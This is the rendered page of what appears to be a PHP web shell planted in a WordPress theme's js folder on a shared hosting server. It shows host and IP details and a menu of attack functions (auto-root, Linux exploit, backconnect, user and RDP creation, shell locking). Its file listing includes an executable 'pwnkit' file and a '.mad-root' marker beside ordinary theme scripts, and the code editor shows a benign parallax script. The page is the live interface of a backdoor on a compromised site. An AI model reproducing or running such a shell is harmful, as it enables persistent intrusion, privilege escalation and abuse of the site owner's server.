Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
formation /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Inview.js
5.27
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
animate.js
318
B
-rw-r--r--
customizer-pro.js
427
B
-rw-r--r--
flexslider-init.js
150
B
-rw-r--r--
flexslider.css
4.97
KB
-rw-r--r--
html5.js
2.39
KB
-rw-r--r--
jquery.flexslider-min.js
16.6
KB
-rw-r--r--
keyboard-image-navigation.js
429
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
script.js
912
B
-rw-r--r--
small-menu.js
1.27
KB
-rw-r--r--
smoothscroll.js
328
B
-rw-r--r--
theme-customizer.js
3.82
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
/** * Parallax Scrolling Tutorial * For NetTuts+ * * Author: Mohiuddin Parekh * http://www.mohi.me * @mohiuddinparekh */ $(document).ready(function(){ // Cache the Window object $window = $(window); $('section[data-type="background"]').each(function(){ var $bgobj = $(this); // assigning the object $(window).scroll(function() { // Scroll the background at var speed // the yPos is a negative value because we're scrolling it UP! var yPos = -($window.scrollTop() / $bgobj.data('speed')); // Put together our final background position var coords = '50% '+ yPos + 'px'; // Move the background $bgobj.css({ backgroundPosition: coords }); }); // window scroll Ends }); }); /* * Create HTML5 elements for IE's sake */ document.createElement("article"); document.createElement("section");
Close